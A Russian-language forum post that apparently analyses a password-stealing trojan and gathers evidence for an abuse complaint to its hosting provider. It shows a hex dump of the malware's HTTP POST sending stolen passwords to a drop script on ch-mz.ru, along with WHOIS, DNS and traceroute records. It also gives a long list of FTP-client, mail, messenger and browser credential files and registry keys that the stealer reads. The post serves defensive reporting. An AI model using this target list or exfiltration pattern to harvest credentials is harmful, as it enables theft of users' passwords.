Mad Dog, вот дополнительные данные для абузы.
все пароли шлются через сокет на адрес http://www.ch-mz.ru/images/catalog/icon/fg54h.php.
Вот конкретно текст отправки через Send после чтения всех паролей
00A40020 50 4F 53 54 20 2F 69 6D 61 67 65 73 2F 63 61 74 POST /images/cat
00A40030 61 6C 6F 67 2F 69 63 6F 6E 2F 66 67 35 34 68 2E alog/icon/fg54h.
00A40040 70 68 70 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F php HTTP/1.0..Ho
00A40050 73 74 3A 20 77 77 77 2E 63 68 2D 6D 7A 2E 72 75 st: www.ch-mz.ru
00A40060 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 ..Content-Type:
00A40070 61 70 70 6C 69 63 61 74 69 6F 6E 2F 78 2D 77 77 application/x-ww
00A40080 77 2D 66 6F 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 w-form-urlencode
00A40090 64 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B d..Connection: K
00A400A0 65 65 70 2D 41 6C 69 76 65 0D 0A 50 72 61 67 6D eep-Alive..Pragm
00A400B0 61 3A 20 6E 6F 2D 63 61 63 68 65 0D 0A 55 73 65 a: no-cache..Use
00A400C0 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 r-Agent: Mozilla
00A400D0 2F 34 2E 30 20 28 63 6F 6D 70 61 74 69 62 6C 65 /4.0 (compatible
00A400E0 3B 20 4D 53 49 45 20 36 2E 30 3B 20 57 69 6E 64 ; MSIE 6.0; Wind
00A400F0 6F 77 73 20 4E 54 20 35 2E 31 3B 20 53 56 31 3B ows NT 5.1; SV1;
00A40100 20 49 6E 66 6F 50 61 74 68 2E 32 3B 20 2E 4E 45 InfoPath.2; .NE
00A40110 54 20 43 4C 52 20 32 2E 30 2E 35 30 37 32 37 3B T CLR 2.0.50727;
00A40120 20 49 6E 66 6F 50 61 74 68 2E 31 29 0D 0A 43 6F InfoPath.1)..Co
00A40130 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 33 35 ntent-Length: 35
00A40140 35 36 0D 0A 0D 0A 61 3D 26 62 3D 67 74 26 64 3D 56....a=&b=gt&d=
00A40150 72 74 26 63 3D 00 00 00 00 00 00 00 00 00 00 00 rt&c=...........
сами данные с паролями я вырезал.
Traceroute
Tracing route to www.ch-mz.ru [87.242.98.91]...
hop rtt rtt rtt ip address fully qualified domain name
1 4 0 1 70.84.211.97 61.d3.5446.static.theplanet.com
2 0 0 0 70.87.254.5 po101.dsr02.dllstx5.theplanet.com
3 0 0 0 70.85.127.109 po52.dsr02.dllstx3.theplanet.com
4 0 0 0 70.87.253.21 et3-1.ibr03.dllstx3.theplanet.com
5 32 32 32 70.87.253.190 be.fd.5746.static.theplanet.com
6 32 51 32 206.223.115.96 equinix.ashb.retn.net
7 143 142 142 87.245.233.205 xe120-2.rt.tc1.sto.se.retn.net
8 193 167 167 90.156.216.32 max2.pvc.masterhost.ru
9 167 191 168 87.242.98.91 v1902.vps.masterhost.ru
Trace complete
Думаю этого будет для них достаточно :kos:
сайт http://www.ch-mz.ru зарегистрирован у хостера www.masterhost.ru . Можно проверить через этот сервис (http://centralops.net/co/DomainDossier.aspx?addr=http%3a%2f%2fwww.ch-mz.ru&dom_whois=true&dom_dns=true&net_whois=true)
Address lookup
canonical name ch-mz.ru.
aliases www.ch-mz.ru
addresses 87.242.98.91
Domain Whois record
Queried whois.ripn.net with "ch-mz.ru"...
% By submitting a query to RIPN's Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian)
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).
ВЛАДЕЛЕЦ САЙТА
domain: CH-MZ.RU
type: CORPORATE
nserver: ns1.budagovsky.ru.
nserver: ns2.budagovsky.ru.
state: REGISTERED, DELEGATED
person: Private Person
phone: +7 9021 762483
e-mail:
[email protected]
registrar: REGTIME-REG-RIPN
created: 2007.12.19
paid-till: 2009.12.19
source: TC-RIPN
Last updated on 2009.09.25 00:02:05 MSK/MSD
Network Whois record
Queried whois.ripe.net with "-B 87.242.98.91"...
% Information related to '87.242.98.0 - 87.242.99.255'
inetnum: 87.242.98.0 - 87.242.99.255
netname: MASTERHOST-VPS-2
descr: MasterHost VPS services
country: RU
admin-c: MHST-RIPE
tech-c: MHST-RIPE
status: ASSIGNED PA
notify:
[email protected]
mnt-by: MASTERHOST-MNT
changed:
[email protected] 20060502
source: RIPE
role: MASTERHOST NOC
address: .masterhost
address: Lyalin lane 3, bld 3
address: 105062 Moscow
address: Russia
phone: +7 495 7729720
fax-no: +7 495 7729723
e-mail:
[email protected]
remarks: ----------------------------------------------------------
remarks: MASTERHOST is available 24 x 7
remarks: ----------------------------------------------------------
remarks: Points of contact for MASTERHOST Network Operations
remarks: ----------------------------------------------------------
remarks: Routing and peering issues:
[email protected]
remarks: SPAM and Network security issues:
[email protected]
remarks: Mail and News issues:
[email protected]
remarks: Customer support:
[email protected]
remarks: General information:
[email protected]
remarks: ----------------------------------------------------------
admin-c: AAS-RIPE
tech-c: AAS-RIPE
tech-c: UNK-RIPE
nic-hdl: MHST-RIPE
notify:
[email protected]
abuse-mailbox:
[email protected]
mnt-by: MASTERHOST-MNT
changed:
[email protected] 20050714
changed:
[email protected] 20050802
changed:
[email protected] 20070410
source: RIPE
% Information related to '87.242.64.0/18AS25532'
route: 87.242.64.0/18
descr: .masterhost
origin: AS25532
notify:
[email protected]
mnt-by: MASTERHOST-MNT
changed:
[email protected] 20050729
source: RIPE
DNS records
name class type data time to live
www.ch-mz.ru IN CNAME ch-mz.ru 86127s (23:55:27)
ch-mz.ru IN MX preference: 10
exchange: mail.ch-mz.ru
86400s (1.00:00:00)
ch-mz.ru IN SOA server: ns2.budagovsky.ru
email: ars.budagovsky.ru
serial: 0
refresh: 10800
retry: 3600
expire: 604800
minimum ttl: 10800
86400s (1.00:00:00)
ch-mz.ru IN NS ns2.budagovsky.ru 86400s (1.00:00:00)
ch-mz.ru IN NS ns1.budagovsky.ru 86400s (1.00:00:00)
ch-mz.ru IN A 87.242.98.91 86400s (1.00:00:00)
91.98.242.87.in-addr.arpa IN PTR v1902.vps.masterhost.ru 628s (00:10:28)
В первый раз я не совсем точно посмотрел что именно воруется из системы. Вот примерный список.
файлы:
C:\WINDOWS\WCX_FTP.INI
C:\Documents and Settings\Пользователь\Application Data\OPERA\OPERA\PROFILE\WAND.DAT
C:\Documents and Settings\Пользователь\Application Data\OPERA\OPERA\MAIL\ACCOUNTS.INI
C:\Documents and Settings\Пользователь\Application Data\THUNDERBIRD\PROFILES.INI
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\2.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\3.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\5.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\6.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\7.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\8.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\2.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\3.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\5.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\6.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\7.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\8.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\2.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\3.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\5.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\6.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\7.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\8.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\2.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\3.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\5.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\6.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\7.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\8.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\2.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\3.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\5.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\6.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\7.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\8.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\2.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\3.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\5.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\6.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\7.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\8.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\2.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\3.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\5.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\6.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\7.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\8.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\2.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\3.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\5.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\6.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\7.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\8.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\.gaim\accounts.xml
C:\Documents and Settings\Пользователь\Application Data\FileZilla\sitemanager.xml
C:\WINDOWS\VD3User.dat
C:\WINDOWS\Vd3main.dat
C:\Program Files\FTP Commander\Ftplist.txt
C:\Program Files\FTP Commander Pro\Ftplist.txt
C:\Program Files\FTP Commander Deluxe\Ftplist.txt
C:\Program Files\Total Commander\Profiles\Prof\ftp.ini
C:\WINDOWS\edialer.ini
C:\Program Files\Trillian\User Settings\*.*
ключи реестра
SOFTWARE\RIT\The Bat!
SOFTWARE\Mirabilis\ICQ\DefaultPrefs
SOFTWARE\Mirabilis\ICQ\NewOwners
Software\Ghisler\Windows Commander
Software\Ghisler\Total Commander
Software\RimArts\B2\Settings
Software\Microsoft\Internet Account Manager\Accounts
SOFTWARE\Far\Plugins\FTP\Hosts
Software\Mail.Ru\Agent\mra_logins
Software\CoffeeCup Software\Internet\Profiles
Всем удачи :wink: берегите свои данные